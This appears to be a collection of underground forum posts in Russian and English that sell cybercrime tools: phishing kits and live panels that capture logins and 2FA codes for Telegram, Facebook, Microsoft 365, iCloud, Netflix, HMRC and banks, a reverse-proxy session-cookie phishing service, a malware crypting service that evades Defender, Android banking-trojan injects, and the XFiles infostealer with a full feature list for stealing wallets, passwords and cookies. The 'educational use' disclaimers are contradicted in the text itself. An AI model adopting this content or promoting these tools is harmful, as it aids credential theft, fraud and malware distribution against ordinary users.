Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)**
Всем привет!
Предлагаю фишинг инструменты для изучения, тестирования и демонстрации уязвимостей вебсайтов.
Фишинг инструменты несут в себе исключительно ознакомительный характер, предназначаются для аудита безопасности, создания собственной и корпоративной защиты от фишинга.
Простая установка, антибот защита, рандом код, HQ фишинг.
Имею многолетний опыт в кодинге, отзывы, много наработок и не публичные проекты.
-------------------------------------------------------
I offer HQ phishing tools for studying, testing and demonstrating vulnerabilities websites.
Phishing tools, designed to audit security, create your own and corporate protection against phishing.
Easy installation, antibot protection, random code, HQ phishing.
I have many years of experience in coding, feedbacks and not public projects.
Grabber (Login/Pass/Additional information/IP, Device info) Page/Panel/Readme
Price 200+
Live Panel (Login/Pass/2FA/IP, Device info) Page/Panel/Readme Price 300+
---------------------------------------
LIST OF CURRENT PROJECTS:
---------------------------------------
-------------------------------------------------------
TELEGRAM - Live Panel
For begginers and professionals. Easy to install and use, fast logs.
- Mobile/Desctop, Phone Number, OTP Telegram Code, OTP SMS Code, Additional
Password, Device Info, 4 redirect pages (send link to victim). Set photo and
texts.
4 white redirect pages/ Phisning panel/ Admin panel/ Readme how to setup
Video:
Price: 250$
**-------------------------------------------------------
-------------------------------------------------------
FACEBOOK.com - Live Panel (META business/personal)**
-Mobile/Desctop , Login/Pass, OTP (Email/Phone/App code), Point Mode (Upload avatar, name and send link), Autofillup ?login=test@test.com, PC Info
GIF how it works: https://gifyu.com/image/Sgp13
GIF how is Point Mode works: https://gifyu.com/image/Sgp10
Price: 250$
**-------------------------------------------------------
-------------------------------------------------------
365 OFFICE/LIVE/HOTMAIL - Live Panel**
- Login/Password/2FA: CALL CODE/SMS CODE/AUTH APP CODE/TAP NUMBER /info
grabber, Locker, Redirect
200$
-------------------------------------------------------
-------------------------------------------------------
One Drive (Gmail, Outlook, Office365, Yahoo, Aol, Other) 2FA - Live Panel
- Login/Password, 2FA: SMS CODE/MAIL CODE/CALL CODE/AUTH APP CODE/LAST 4
DIGIT PHONE NUMBER/TAP NUMBER/Telegram/Windows Notifications/Device
info/Locker/Redirect
Video:
Price: 200$
-------------------------------------------------------
-------------------------------------------------------
ICLOUD / APPLE Live Panel 2FA/CC+3D
Latest new design.
- Login/Password/2FA/Full Info/CC/3D SMS/3D PUSH TAP/Device Info
Video:
Price: 250$
-------------------------------------------------------
-------------------------------------------------------
NETFLIX - Live Panel CC+3D
- Login/Password/Billing Info : Full Name / Street Address / City / State /
Zip Code / Phone Number / Date Of Birth > Payment Info: Card Number / Expiry
Date / CVV > SMS Code / Push Tap
Video:
Price: 250$
-------------------------------------------------------
-------------------------------------------------------
HMRC UK https://www.access.service.gov.uk/login/signin/creds Live Panel
Login/Password/SMS Code/Email Code/Auth APP Code/Mobile/Desctop/Device Info
Video:
Price: 250$
-------------------------------------------------------
-------------------------------------------------------
SANTANDER.DE Live Panel Login info/SMS/Push Tap
Login/Password/SMS Code/Push Tap/Mobile/Desctop/Device Info
Video:
Price: 250$
-------------------------------------------------------
------------------------------------------------------
PAYWITHMOON.com - Crypto Phishing - Purchase Virtual Visa Prepaid Cards with
crypto
How it Works:
User enters card amount, selects payment method (BTC, ETH, USDT, LTC, XMR),
gets your payment address from settings.
- Multi Page, Mobile/Desctop, Payment in Bitcoin, Etherium, Tether (ERC20),
Litecoin, Monero, QR Code for payment address, Telegram Notifications
Video:
Price 300$
-------------------------------------------------------
-------------------------------------------------------
TREZOR.COM - Crypto Phishing - Seed Phrase Grabber
- Mobile/Desctop, Copy of original, 12/24 backup codes, All user Device Info
Video:
Price: 200$
-------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
FEEDBACKS**:**
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Лицензионное соглашение:
- Блокировка на все RU машины (RU header).
- Продукт (комплект из фишинг инструментов, админ панели и инструкции по
установке) поставляется "как есть", функционал в описании к продукту.
- Автор не несет ответственности за ваши законные/противозаконные действия, в
результате которых был приченен вред какому-либо лицу.
- Продукт несет в себе исключительно ознакомительный характер и
предназначается для изучения, тестирования и демонстрации уязвимостей
вебсайтов.
- Продукт предназначается для аудита безопасности и создания собственной и
корпоративной защиты от фишинга.
- Покупатель обязуется не использовать продукт на RU машинах.
- Запрещено выкладывать в публичный доступ файлы продукта и админки.
Greeting,
Handmade FUD crypt service, EXE/BAT output, support all type of malwares. [Rat, Stealer, Loader, Botnet]
.NET stub lightweight size
Bypass WD & WD cloud
Bypass Browser Alerts (Edge not guaranteed)
Support x86_x64 Bins
Ring3 unhooking
LoadPE&RunPE (options)
Startup(on request)
Bind/Merge(on request, memexct / 10$ extra charge)
AntiVM (on request /10$ extra charge)
**Note1: Smart screen bypass not included.
Note2: I work through a guarantor!**
Price: 100$ first crypt, 70$ second crypt.
Price: 10 day crypts, 500$, 2 crypts a day
Open to test your malware before and after crypt in Live through Remote desktop
Contact: TG, Evild34d
Spoiler: Русский
Доброго времени суток.
Готовые модули:
Цель| Цена в неделю
---|---
okta.com + office365 aka login.microsoftonline + any ADFS + github.com| 300$
att.com| 350$
changehero.io| 300$
booking.com| 500$
---|---
web.telegram.org| 500$
amazon.com| 300$
---|---
bybit.com| 500$
---|---
aol.com| 300$
citrix| 500$
rbcwm| 400$
---|---
Пишу фейки (реверс-прокси). Фейки воруют сессионные куки.
а) Новые - за фикс (1-5k$) + аренду (100$-1k$/нед, базовый сервер включён в стоимость). Время выполнения - от суток до недели+ (сроки дам после оценки сайта). Паблик таргеты могу делать бесплатно и продавать публично. Приват таргеты после изготовления не публикуются - но также могут быть сданы в аренду, если покупатель уже знает линк.
б) Готовые - за аренду. Доступна бесплатная демка на каждый модуль.
Все вопросы в лс. Гарант форума +, комиссия на вас.
Сорсы не показываю и не продаю (полностью или частично), не ставлю софт на ваш
серверхостинг который вы советуете (исключение - гейты).
Написан на NodeJS.
Домены, прокси (если нужны), антиддос, кло, трекер - с вас. По СНГ таргетам не
работаю, по государственным таргетам не работаю.
WAFы (cloudflare, akamai etc) обхожу, в зависимости от их настроек.
У вас не идёт траф, ключ в бане, плохой конверт, не налится мат, фейк больше
не нужен, вы передумали - манибека нет. Пишите полные требования до сделки.
Если нужен заход в ЛК на фейке - предоставьте аккаунты для тестов.
Ставлю гейты для проксирования (чтобы не палить IP бекенда в A-записях DNS
доменов) бесплатно (антиабуз+, антиддос-). Либо используйте своё решение для
скрытия основного сервера (должно слать заголовок x-forwarded-for), иначе его
начнут абузить-ддосить-пенетрировать. Впрочем, гейты тоже будут.
Заказом или приобретением фишинговых инструментов вы подтверждаете, что
планируете использовать продукты автора исключительно ради лёгкой наживы и
красивой жизни. Использование в ознакомительных или белых целях не
допускается!
Первый контакт - ЛС. Дальше токс или жаба+отр или продолжаем в ЛС. В тг по фишам не отвечу. Онлайн днём по будням (ночью я сплю, экстренной связи нет). Лучше сразу распишите все вопросы и вводные что у вас есть.
P.S. Для модлишки и эвилджиникса фишлеты не делаю, мой софт на них не основан.
Spoiler: Фичи
(если написано [панель] = можно настроить из панели, [через меня] = придётся писать лично):
Выполнение вашего php (антибота или клоаки, в докере) [через меня]
Инжект и замена вашего html на страницах фейка [панель]. Подгрузка файлов вайта [через меня]
Защита от Google Safebrowsing aka Chrome alert. Domain shadowing.[панель]
Делаю .onion таргеты, делаю показ фейка на .onion доменах [через меня]. Учтите что онионы тоже можно ддосить
Отключение кэширования для любых файлов, папок, или просто частей линка [панель]
Отображение валидности (зашёл ли человек в аккаунт, или же ввёл неверные лог:пасс) [панель]
Чистка от аналитики орига
Работа из подпапки (вместе с php-кло или просто от ботов)(работают не все сайты) [панель]
Вместе с лог:пассом или цц можно сохранять куки, UA, IP, реферер, домен, другие данные (пишите какие данные нужны)
Просмотр собранных данных в таблице (сортировка, поиск), экспорт за нужный временной диапазон в настраиваемом формате
Проксирование соединения между фейком и оригом. Одну прокси на все сессии либо случайную прокси из списка на каждую сессию. [панель]
Отключение разделов сайта и частей функционала [через меня]
Выпуск бесплатных SSL cертификатов для новых доменов (в т.ч. wildcard), http->https редиректы [панель]
Запроса ОТП для нужной сессии по кнопке из панели сейчас нет. Уведомлений в токс и джаббер сейчас нет.
Spoiler: В чём разница между типами фишинга
Реверс прокси (делаю):
зависит от аптайма оригинала
антиддос нужно обходить для каждого запроса страницы
полный доступ к сайту на фейк версии
кража сессии (кук, можно indexedDB или localStorage)
пользователю доступен личный кабинет (писем, транзакций, баланса, и т.п.) и действия в нём
контент сайта - как на момент запроса.
Цена зависит от сложности фронтенда сайта, его антифрода и от необходимости проксировать другие ресурсы (процессинги цц, сторонние сервисы).
Полная копия (не делаю):
не зависит от аптайма оригинала
антиддос нужно обойти только один раз (чтобы сделать копию)
доступ только к скопированным страницам
нет кражи сессии (кук)
нет просмотра ЛК и действий в нём
контент сайта - такой каким был на момент копирования.
Цена зависит от количества страниц и от сложности логики сайта, которую нужно воссоздать (добавление товаров в корзину, например).
Лайв панель (не делаю):
как полная копия, но с возможностью запрашивать у пользователя ОТП по клику, лайв чатом и т.п. наворотами для взаимодействия с юзером. ЛК на фейке часто не имеет (т.к. не может взять с ориг-сервера пользовательские данные для отображения на фейке).
Spoiler: English
Good day, sir.
Ready modules:
Target| Weekly price
---|---
okta.com + office365 aka login.microsoftonline + any ADFS + github.com| 150$
att.com| 350$
changehero.io| 300$ + 10%
booking.com| 500$
---|---
web.telegram.org| 500$
amazon.com| 300$
---|---
bybit.com| 500$
---|---
aol.com| 300$
citrix| 500$
rbcwm| 400$
---|---
I do phishing websites aka fakes (reverse-proxy kind). Fakes steal cookies.
a) New - for fixed price ($1-5k) + use fee ($100-$1k/week, base server cost
included). I'll set a timeframe after target estimation, it could be from a
day to a week+. Popular targets may be done for free and then sold publicly.
Private targets will not be listed, but leased if buyer aware of link already.
b) Ready - for use fee only. Free demo available.
Ask questions in pm. Middleman-Escrow-Guarantor of forum accepted, their fee is on your side.
I don't show sources, I don't sell sources nor part of it.
I won't install on your server nor hosting of your advice (except for gates).
Coded in NodeJS.
I don't provide domains, proxy (if necessary), ddos-protection, cloak,
tracker, etc - it's on you.
Not doing targets from CIS-countries and national governments of any country.
I do bypass various WAFs (cloudflare, akamai etc), depending on their
settings.
If your traffic is stopped, keyword is banned, low ROI, can't cashout, fake is
not needed anymore, you've changed your mind - no moneyback. Write your full
requirements before deal.
If you need working client area (aka user panel) in fake - provide accounts
for testing that feature.
I can setup gates to proxy your fake (to avoid leak of backend IP in A-records
of domain's DNS) for free (bulletproof+, ddos-protected-). Or use your own
solution for that (it must provide x-forwarded-for header), otherwise backend
will be abused-ddosed-penetrated. Gates too, though.
By ordering or buying phishing instruments you accept, that you plan to use
author products exclusively for easy money and beautiful life. Usage in
whitehat or informational purposes is not allowed!
First contact in PM. Then tox or jabber+otr or still PM. No telegram, no discord, no signal. Online on weekdays 6AM-3PM UTC/GMT (sorry US residents). Better describe all questions you have and your brief in first message.
P.S. Not doing phishlets for modlishka and evilginx, my software is not based on those.
Spoiler: Features
([panel] = this setting can be tweaked in panel, [me] = you'll have to contact me to use that):
Execution of custom php (antibot or cloak, in docker) [me]
Injection and replace of custom html on fake pages [panel]
Protection from Google Safebrowsing aka Chrome alert. Domain shadowing.[панель]
Doing .onion targets, usage of .onion domains [me], subdomains [panel], xn-- unicode domains [panel]. Please note, .onion domains could be ddosed too
Disable cache for any files, folders or by part of link [panel]
Validity check of accounts (did they logged in or just entered invalid log:pass) [panel]
Removal of original analytics scripts
Use subfolder as rootfolder (with custom php cloak or as additional antibot measure)(not all websites will work with that) [panel]
With credentials or CCs we can also save cookies, UA, IP, referer, domain, other data (specify what do you need)
View of collected data in table (sorting, search), export with daterange and custom format
Proxying connection from fake to original website. One proxy for all sessions or assign random-from-list proxy to each session. [panel]
Disabling some pages [me]
Issue free SSL certs for new domains (wildcard too), http->https redirects [panel]
No OTP request (triggered in panel) for specific session at the moment. No Tox and Jabber notifications at the moment.
Spoiler: Difference in types of phishing
Reverse proxy (doing):
depends on uptime of original website
needs to bypass ddos-protection on every page request
full access to website on fake version
session theft (cookies, also can do indexedDB and localStorage)
user can view client area (messages, transactions, balance, etc) and perform actions in it (like send message, send transaction)
website content - as at the moment of request.
Price depends on complexety of target's fronend, it's antifraud and need to proxy other resources it depends on (like CCs processings, 3rd party services).
Full copy (not doing):
doesn't depends on uptime of original website
needs to bypass ddos-protection virtually only once (to make a copy)
access to copied pages only
no session theft (because no connect to original website to obtain session)
client area is not available (again, no connection to target)
website content - as it was at the moment of copy.
Price depends on amount of pages, ddos-protection bypass and complexety of website's logic we need to recreate (like adding goods to cart and then displaying them on "confirm order" page before purchase).
Live panel (not doing):
like a full copy, but with ability to request OTP from user when it's needed, live chat on fake and other features to interact with user. Often does not have client area (because it can't connect to original server to obtain user data).
Приветствую всех форумчан! Представляю сервис по разработке инжектов исключительно под Anubis и Cerberus.
Для корректной работы инжетов нужно скачать с файлы и следовать инструкциям (не сложно всего пару кликов) 7piklneuwm5zkszxi7dxx4f7n4dr772kcc5bhmmnute4heyadgtq5hyd.onion/panel/manual
На момент создания топика инжектов нету. По первым 5 запросам сделаю инжекты и выложу их бесплатно на 1 месяц для всех.
Так же будет отключена система пополнения баланса, до выполнения этих 5-и инжектов.
Буду рад выслушать от вас, что нужно добавить на сайт для улучшения и упрощения.
Если будут желающие приобрести инжекты по Cerberus.
Пишите мне в Jabber(контакт ниже).
Пополнение баланса на сайте будет отключена, до того как сайт будет доведен до идеала.
Контакт:
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F1qSrD0W%2FXFiles- EN.gif&hash=a1bae907ab225e532a2d6ac4fa68fe33)
Spoiler: English language
XFiles is a stealer that can surprise with its simplicity and ease of use, designed for both one and a huge team.
♕Everything is already configured for you and ready to use!
♕**Native Stub, written in the C programming language. The created builds are 70% unique thanks to our self-written protector. Plan up to 90% (Coming soon)
System calls are used wherever possible, in other cases WinAPI is used, no third-party libraries are used or required, the decoding of the collected log occurs entirely on the server.**
♕Work panel in Windows and in the web panel (Coming soon)
♕Crypt build for the Thief subscription - Unlimited recryption of your file.
- We encrypt only EXE of our clients.
- At the output EXE or MSI
- Guaranteed bypass of AV DEFENDER
- Any icon for the EXE file.
- Gluing with white exe.
♕For Professional subscription - a unique dll file is issued to bypass smart and browser Alerts, as well as our scripts.
♕Has its own non-resident Loader.
♕Google Cookies recovery by token.
♕The stealer collects data if the victim 's browser is open.
♕The stealer collects up to 1GB of browser extensions.
♕Private Proxies (Coming soon)
♕For each build, a unique obfuscated data exchange protocol is generated for interaction with the gate (knock), delivery of logs to the gate occurs in parts. Thanks to this, we greatly increase the life of builds.
♕Works on machines from Windows 7 to Windows 11 inclusive.Please note that our stealer does not knock on the CIS!
♕Data collection works in memory, nothing is dropped to disk.
♕Dynamic browser data collection, collects Cookies, Passwords, Autofill, Credit Cards. Supports over 50+ browsers (Google Chrome, Chromium, Opera, Opera GX, Edge, Firefox, etc.)
♕Collection of over 800+ popular browser crypto wallets (extensions) integrated into Chrome, Brave, Opera, Firefox and Edge browsers. Collects all possible Crypto, Nft wallets, Password, 2Fa, OTP, Authentication Managers and Notes.
♕Collection of Crypto Wallets Desktop
✦
Armory,Atomic,Coinomi,BitcoinCore,Exodus,JaxxLiberty,Guarda,EverSurf,MoneroCore,Electrum
(Binance,Kraken,Copay,Gate.io,Mexc,Thetan,Lunascape,Tonkeeper,Beam) coming
soon
♕Collection of Crypto USB Wallets Desktop
✦ Ledger, Trezor, (coming soon)
♕Collection of Authenticator/2FA/OTP desktop
✦ WinAuth, SecureKey, Authme, 2FAGuard, Protecc, 2fast. (coming soon)
♕Desktop messenger collection
✦ Discord, Telegram (WhatsApp, Signal, Pidgin, RamBox, Viber, Psi+
Pidgin, tox, Matrix) Coming soon
♕Desktop FTP clients collection
✦ FileZilla, WinSCP (CoreFTP, Snowflake, CyberDuck, FTP Navigator, FTPRush,
FlashFXP, Smartftp, TotalCommander, Winscp, Ws_ftp, Coreftp) coming soon
♕Desktop VPN clients collection
✦ OpenVPN, ProtonVPN (WindscribeVPN, NordVPN, TurboVPN, VPN master. EarthVPN,
AzireVPN, OpenVPN, PrivateVPN_Global_AB) coming soon
♕Desktop gaming clients collection
✦ Steam (Origin, Battlenet, Mojang session, Twitch, OBS profiles) coming
soon
♕Collection of VNC desktop clients
✦ TightVNC, TigerVNC, RealVNC, UltraVNC.
♕Remote control tools for desktop clients
✦ AnyDesk, Windows RDP (Teamwierer) coming soon
♕Collection of Mail desktop clients
✦ Outlook (New, Classic, Office 2016 with password decryption), Thunderbird.
(FoxMail, EMclient, Mailbird & Mailspring) coming soon
♕Desktop notes collection
✦ OneNote, Sticky Notes, NoteFly, Notezilla, Simple Sticky Notes, Windows
Sticky Notes of win7 10 11 - Coming soon
♕Desktop password collection and storage
✦ KeePass, NordPass, LastPass, BitWarden, 1Password, RoboFormб Credman
passwords Coming soon
♕Customizable flexible file grabber, written with an emphasis on optimization and the use of system calls, due to which fewer detections from AV.
♕Protection from AI Bots. (Coming soon)
♕Windows/MacOs stealer/HVNC logs purchase/sale store - coming soon
♕ChatGPT and ChatIA integration into panels - coming soon
♕Antidecket Browser integration - coming soon
♕**AutoCheck of crypto balances and steam inventory - coming soon
Read all updates in the posts to the topic.**
Spoiler: Tech part
**By subscribing for $200/month, you open access to the following
functionality
✦ Beautiful, modern, convenient control panel on Windows, with a choice of
Light or Dark theme. The panel allows
✦ Manage a team or work alone
→ Ability to invite and kick team members and create your own users with a
login and password
→ As a team owner, you can change access rights to any functionality for your
members.
Don't want to give any rights except the right to view logs? ✔ no problem
Do you want him not to be able to delete logs, create builds, or even
completely limit his rights? ✔ your member has lost rights
Change the password for the user you created
Kick a user out of the team
✦ Join other teams
→ You don’t have to be a member of just one team, you can become a member at
the invitation of the owner of another team!
→ Your rights as a member are determined by the owner of the team.
✦ Create, edit Builds with the Build Configurator, which supports flexible
customization
✔ Anti-RDP - increases the life of the build
✔ Fake dialog box with text
✔ Configure the loader - download and run your file from the link when running
the stealer
✔ Blocking knocks from certain countries
✔ Grabber extensions from Browsers
✔ Obfuscation - you can configure the obfuscation of the generated executable
file. Each build has basic obfuscation/encryption.
✔ You can upload your own icon, as well as change information about the
created executable file.
✔ Convenient multi-level File Grabber based on rules, supporting file search
in specified folders, rules can contain sub-rules, you can select the
operating mode for each rule, at the moment Two modes
→ By folder - search for a specific folder, when it is found, files will be
collected in it according to the filters you specified. This type can nest
other rules, for example, you can easily create a rule for collecting OpenVPN
configs yourself, although we already have such functionality configured for
you
→ By nesting level - will search for all files in a given depth, but only
those that match your file filters will be selected.
→ File filter capabilities
→ Check for file size size
→ Check for file name (by mask), for example *.txt, *.doc, pass.txt,
passwords
✦ Setting up log knockout, checking logs for uniqueness via IP and (or) HWID.
✦ Setting up notifications in Telegram, with the ability to choose which logs
you and (or) your participants want to receive notifications for, the ability
to make your own log knockout format in Telegram, you can add variables to
your text.
✦ Search, download and delete your logs
→ With a flexible search system, you will find the log you need in a matter of
seconds
→ Ability to bulk delete or download logs from both the server and disk
→ The panel shows which logs have already been downloaded, there is no need to
re-download them
→ If you do not need some logs on the disk, you can delete them from your disk
with 1 click, while they will remain on the server
→ Ability to see which of the participants downloaded the log
→ Ability to find out from whose build the log came (if, for example, the
build created not by you)
→ Each log displays the following information
️ Country - where the log came from
️ Tags - added by you when creating the build
Wallets - names or icons of wallets
Services - a kind of domain detect, pre-loaded domains and icons
️ Autofills - number of autofills (from browsers)
CC - number of credit cards (from browsers)
Cookies - number of cookies (from browsers)
Discord tokens - number of tokens (from browsers)
️ Archive size
Log receipt date
IP address - victim's address.
→ The log format is specially made similar to other formats for ease of
processing.
✦ View team statistics
→ Top 10 team members
→ Top 10 countries by logs
→ Top 10 wallets
→ Visualization of received logs by time using charts
✦ Automatic Panel Update
→ The software automatically finds out when a new update is released and
downloads it automatically the next time you launch
✦ Follow the news on the main page
✦ Website where you can
→ Download software (panel)
→ View news related to project
→ Get information about your account and its activity
✦ Support service works 24/7**
Spoiler: Admin Panel Foto
Spoiler: Log Structure
Spoiler: Developer's Comment
Even good software is of little value without constant support and maintenance by its author. New versions of software are released, aver analyzes malware, one way or another, something needs to be constantly changed, updated, and finalized. Programs are updated, aver databases are updated, and software without support in a month becomes no better than public. For example, let 's take Azorult, which was the most popular stealer at one time, but quickly died after the author disappeared. At first, because of the large number of detections, but it was finally finished off by the Chrome update (version 80), which changed the encryption algorithms. Therefore, buying a subscription is a guarantee that we will support our project. About crypto. Someone thinks that crypto is a panacea, it doesn't matter that even Windows Def detects malware, you can encrypt it and go on working. This is not true. Remember once and for all - crypt only saves from detections in statics, that is, when the file is on the disk, or sent by mail, downloaded from somewhere. In dynamics, the software creator should remove detections and nothing else. Legends about miracle cryptographers who supposedly remove runtime detections are circulating on forums, but this is another urban legend, crypt complicates malware analysis (depending on the tricks of the cryptographer), this is the best he can do.
Spoiler: Prices for our Product and Contacts
**PM - this forum
TOX -
C96EA8DFB780D9053728816F20901315F6284CB73B735559100696FB30B31364CE0AD357E634
Jabber - luciferxfiles@exploit.im
Telegram - https://usrlnk.io/XFiles
Matrix - https://matrix.to/#/@luciferxfiles:matrix.org
Our Matrix Channel - https://matrix.to/#/#XFILESDevblog:matrix.org
Our Matrix Chat - https://matrix.to/#/#XFilesPublicChat:matrix.org**
♕Premium Subscription, everything you need for work
Price - $200 - 1 Month.
✔ 24/7 Support
✔ Premium Chat in Matrix for clients.
✔ Maximum 20 users per team.
✔ Windows C++ Native Stab X64
✔ Access to the manual.
✔ Google token recovery.
✔ Non-resident Loader.
Crypt (Unique Stab)
Bypass Defender.
Bypass Smartscreen.
Bypass Browser Alerts.
Private Scripts.
MacOS Stab (in development)
♕Thief Subscription, for people who are aware of their actions.
Price - $450- 1 Month.
✔ 24/7 Support
✔ Premium Chat in Matrix for clients.
✔ Maximum 20 users in a team.
✔ Windows C++ Native Stab X64
✔ Access to the manual.
✔ Google token recovery.
✔ Non-resident Loader.
✔ Crypt (Unique Stab)
✔ Bypass Defender.
Smartscreen Bypass.
Browser Alerts Bypass.
Private Scripts.
MacOS Stab (under development)
♕Professional Subscription, for like-minded people - a quick start to launch
your traffic!
✔ 24/7 Support
✔ Premium Chat in Matrix for clients.
✔ Maximum 20 users in a team.
✔ Windows C++ Native Stab X64
✔ Access to the manual.
✔ Google token recovery.
✔ Non-resident Loader.
✔ Crypt (Unique Stab)
✔ Defender Bypass.
✔ Smartscreen Bypass.
✔ Bypass Browser Alerts.
✔ Private Scripts.
MacOS Stub (in development)
XFiles - это стиллер способный удивить своей простой и удобством использования, рассчитанный как на одного так и на огромную команду.
♕За вас уже всё настроено и готово к использованию!
♕Стаб нативный, написан на языке программирования C. Создаваемые билды на
70% уникальный благодаря нашему самописному протектору.План до 90% (Скоро)
Используются системные вызовы где только можно, в остальных случаях
используется WinAPI, никакие сторонние библиотеки не используются и не
требуются, расшифровка собранного лога происходит полностью сервере.
♕Панель работы в Windows и в веб панели(Скоро)
♕Крипт билда для подписки ВОР - Неограниченный рекрипт вашего файла.
- Криптуем только EXE наших клиентов.
- На выходе ЕХЕ или MSI
- Гарантированный обход АВ DEFENDER
- Любая иконка для ЕХЕ файла.
-Склейка с белым ехе.
♕Для подписки Профессионал - выдается уникальный файл dll для обхода смарта и браузерных Алертов, а так же наши скрипты.
♕Имеется свой нерезидентный Loader.
♕Восстановление Google Куков по токену.
♕Стиллер собирает данные если браузер у жертвы открытый.
♕Стиллер собирает до 1GB браузерных расширений.
♕Приватные прокладки (Скоро)
♕Для каждого билда генерируется уникальный обфусцированный протокол обмена данными для взаимодействия с гейтом (отстук), доставка логов до гейта происходит частями. Благодаря этому, мы многократно увеличиваем жизнь билдам.
♕Работает на машинах от Windows 7 до Windows 11 включительно.Обратите внимание что наш стиллер не стучит по СНГ!
♕ Сбор данных работает в памяти, ничего не дропается на диск.
♕Динамический сбор данных браузеров, собирает Куки, Пароли, Автозаполнения, Кредитки. Поддержка более 50+ браузеров (Google Chrome, Chromium, Opera, Opera GX, Edge, Firefox и так далее)
♕Сбор более 800+ популярных браузерных крипто кошельков (расширений) интегрированные в браузеры Chrome,Brave,Opera,FireFox и Edge. Собирает все возможные Crypto,Nft wallets, Password,2Fa,OTP,Authentication Managers и Notes.
♕Сбор Крипто Кошельков Desktop
✦
Armory,Atomic,Coinomi,BitcoinCore,Exodus,JaxxLiberty,Guarda,EverSurf,MoneroCore,Electrum
(Binance,Kraken,Copay,Gate.io,Mexc,Thetan,Lunascape,Tonkeeper,Beam) скоро
♕Сбор Крипто USB Кошельков Desktop
✦ Ledger, Trezor, (скоро)
♕Сбор Authenticator/2FA/OTP desktop
✦ WinAuth, SecureKey, Authme, 2FAGuard, Protecc, 2fast. (скоро)
♕Сбор мессенджеров desktop
✦ Discord, Telegram (WhatsApp, Signal, Pidgin, RamBox, Viber,Psi+
Pidgin,tox,Matrix) Скоро
♕Сбор FTP клиентов desktop
✦ FileZilla, WinSCP (CoreFTP, Snowflake, CyberDuck,FTP
Navigator,FTPRush,FlashFXP,Smartftp,TotalCommander,Winscp,Ws_ftp,Coreftp)
скоро
♕Сбор VPN клиентов desktop
**✦ OpenVPN, ProtonVPN (WindscribeVPN, NordVPN, TurboVPN, VPN master.
EarthVPN,AzireVPN,OpenVPN,PrivateVPN_Global_AB) скоро **
♕Сбор игровых клиентов desktop
✦ Steam (Origin, Battlenet, Mojang session, Twitch, OBS profiles) скоро
♕Сбор VNC клиентов desktop
✦ TightVNC, TigerVNC, RealVNC, UltraVNC.
♕ Инструменты удаленного контроля клиентов desktop
✦ AnyDesk, Windows RDP (Teamwierer) скоро
♕Сбор Почт клиентов desktop
✦ Outlook (New, Classic, Office 2016 с дешифровкой пароля), Thunderbird.
(FoxMail, EMclient, Mailbird & Mailspring) скоро
♕Сбор заметок desktop
✦ OneNote, Sticky Notes,NoteFly,Notezilla,Simple Sticky Notes,Windows Sticky
Notes of win7 10 11 - Скоро
♕Сбор хранение паролей desktop
✦ KeePass, NordPass, LastPass, BitWarden, 1Password, RoboFormб Credman
passwords Скоро
♕Настраиваемый гибкий файловый граббер, написан с упором на оптимизацию и использованием системных вызовов, благодаря чему меньше детектов от AV.
♕Защита от AI Ботов. (Скоро)
♕Магазин покупки/продаже логов Windows/MacOs stealer/HVNC -скоро
♕Интеграция ChatGPT и ChatIA в панели - скоро
♕Интеграция с Антидекет Браузером - скоро
♕**АвтоЧек крипто балансов и инвентаря steam - скоро
Все обновления читайте в постах к теме.
Spoiler: Тех часть
Оформив подписку в $200/месяц, вы открываете доступ к следующему функционалу
✦ Красивая, современная, удобная панель управления на Windows, с выбором
Светлой или Тёмной темы. Панель дает возможность
✦ Управлять командой или работать одному
→ Возможность приглашать и выгонять участников команды а также создавать своих
собственных пользователей с логином и паролем
→ Как владелец команды, вы способны изменять права доступа к любому
функционалy вашим участникам.
Не хотите давать никаких прав кроме права просмотра логов? ✔ нет проблем
Хотите чтобы он не мог удалять логи, создавать билды, или даже полностью
ограничить его в правах? ✔ ваш участник остался без прав
Смена пароля созданному вами пользователю
Выгнать пользователя из команды
✦ Вступать в другие команды
→ Не обязательно состоять только в одной команде, по приглашению владельца
другой команды, вы можете стать её участником!
→ Ваши права как участника, определяет владелец команды.
✦ Создавать, редактировать Билды с помощью Конфигуратора Билдов, который
поддерживает гибную настройку
✔ Анти-Виртулка - увеличивает жизнь билда
✔ Фейковое диалоговое окно с текстом
✔ Настроить лоадер - скачивание и запуск вашего файла по ссылке при запуске
стиллера
✔ Блокировка отстука с определенных стран
✔ Граббер расширений с Браузеров
✔ Обфускация - вы можете настроить обфускацию сгенерированного исполняемого
файла. Каждая сборка имеет базовую обфускацию/шифрование.
✔ Вы можете загрузить свои иконку, так же изменить информацию о созданном
исполняемом файле.
✔ Удобный многоуровненый Грабер Файлов на основе правил, поддерживающий поиск
файлов в заданных папках, правила могут содержать подправила, вы можете
выбрать режим работы для каждого правила, на данных момент Два режима
→ По папке - поиск определенной папки, при нахождении её, в ней будут
собиратся файлы по заданным вам фильтрам. Этот тип может вкладывать в себя
другие правила, например можно с легкостью создать правило для сбора OpenVPN
конфигов самому, хотя у нас и так есть такой функционал настроенный за вас
→ По уровню вложенности - будет искать все файлы в заданной глубине, но
отбиратся будут только те которые соответствуют вашим файловым фильтрам.
→ Возможности файловых фильтров
→ Проверка на размер файла размер
→ Проверка на название файла (по маске), например *.txt, *.doc, pass.txt,
passwords
✦ Настройка отстука логов, проверка логов на уникальность через IP и (или)
HWID.
✦ Настройка уведомлений в телеграм, с возможностью выбора на какие логи вы
и(или) ваши участники хотят получать уведомления, возможность сделать свой
формат отстука лога в телеграм, можно добавлять переменные в свой текст.
✦ Искать, загружать и удалять ваши логи
→ С гибкой системой поиска, вы найдете требуемый вам лог в считанные секунды
→ Возможность массово удалять или загружать логи как с сервера так и диска
→ В панели видно какие логи уже скачаны, нет необходимости перекачивать их
→ Если вам не нужны какие то логи на диске, вы можете 1 кликом их удалить с
вашего диска при этом они останутся на сервере
→ Возможность посмотреть кто из участников скачал лог
→ Возможность узнать с чьего билда пришел лог (если, например, билд создали не
вы)
→ В каждом логе отображаются следующая информация
️ Страна - откуда пришел лог
️ Теги - добавленные вами при создании билда
Кошельки - названия или иконки кошельков
Сервисы - своего рода домен детект, заранее загруженные домены и иконки
️ Автозаполнения - количество автозаполнений (с браузеров)
CC - количество кредиток (с браузеров)
Куки - количество куков (с браузеров)
Discord токены - количество токенов (с браузеров)
️ Размер архива
Дата получения лога
IP адрес - адрес жертвы.
→ Формат лога специально сделан похожим на другие форматы для удобства
отработки.
✦ Смотреть статистику команды
→ Топ 10 участников команды
